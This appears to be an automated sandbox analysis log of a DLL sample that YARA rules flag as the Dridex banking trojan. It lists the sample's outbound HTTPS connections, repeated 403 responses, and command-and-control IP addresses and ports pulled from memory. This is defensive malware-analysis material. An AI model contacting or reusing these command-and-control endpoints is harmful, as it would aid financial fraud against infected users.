                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:01:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:01:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:01:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:01:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:01:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:02:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:03 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:03:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:03 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:04:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: loaddll32.exe, 00000000.00000003.1061650734.0000000000FF5000.00000004.00000001.sdmpString found in binary or memory: https://142.46.210.220/
                      Source: loaddll32.exe, 00000000.00000003.1034567517.0000000000FF5000.00000004.00000001.sdmpString found in binary or memory: https://18192.46.210.220/H
                      Source: rundll32.exe, 00000003.00000003.1013667932.00000000005C4000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: rundll32.exe, 00000003.00000003.1142934817.00000000005C4000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/8
                      Source: rundll32.exe, 00000003.00000003.1142934817.00000000005C4000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/H
                      Source: rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/.
                      Source: rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/563209-4053062332-1002
                      Source: rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/563209-45
                      Source: rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/
                      Source: rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/Certification
                      Source: rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/GlobalSign
                      Source: rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/graphy
                      Source: rundll32.exe, 00000003.00000003.995243252.00000000005C4000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/nd
                      Source: rundll32.exe, 00000003.00000002.1191016182.0000000004871000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: loaddll32.exe, 00000000.00000003.872455871.0000000000FF4000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6
                      Source: rundll32.exe, 00000003.00000003.1142934817.00000000005C4000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: rundll32.exe, 00000003.00000002.1187731513.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000003.00000003.859025204.00000000005C5000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/derpd
                      Source: rundll32.exe, 00000003.00000003.859025204.00000000005C5000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/x
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4865Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3939F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49759 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49774 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49861 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d9db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.61db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.101db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.rundll32.exe.6adb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.rundll32.exe.6adb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.48fdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.48fdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d9db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.61db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.101db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.764183510.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.799249940.0000000001000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1188824547.000000006E361000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.799320451.00000000048E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.782470238.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1191678149.000000006E361000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.763243563.0000000000600000.00000040.00000010.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojanShow sources
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3651A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.31954.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3767C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E380220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E38D620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E36CA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E38FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E369E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E379E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37A660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E387660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E382E60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E381240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E378AB0
